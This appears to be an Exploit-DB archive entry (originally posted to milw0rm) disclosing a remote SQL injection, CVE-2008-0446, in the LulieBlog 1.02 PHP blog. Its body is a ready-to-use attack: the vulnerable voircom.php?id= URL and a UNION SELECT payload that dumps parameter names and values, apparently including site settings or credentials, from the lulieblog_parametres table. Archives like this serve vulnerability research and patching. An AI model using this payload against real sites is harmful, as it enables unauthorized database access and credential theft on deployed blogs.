LulieBlog 1.02 - SQL Injection

Author: Khashayar Fereidani
type: webapps
platform: php
port: 
date_added: 2008-01-22  
date_updated: 2016-11-08  
verified: 1  
codes: OSVDB-42789;CVE-2008-0446  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comLulieBlog_1.0.2.rar  

raw file: 4969.txt  
#####################################################################################
####              LulieBlog Version 1.02 Remote Sql Injection                    ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://sourceforge.net/project/platformdownload.php?group_id=204083
#                                                                                   #
#Injection Adress :  http://Sitename/voircom.php?id=[SQL CODE]                      #
#                                                                                   #
#                                                                                   #
#[SQL CODE] : -1%27union/**/select/**/0,concat(nom_parametre,0x3a,0x3a,valeur_parametre),2,3,4,5/**/from/**/lulieblog_parametres/*
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# milw0rm.com [2008-01-23]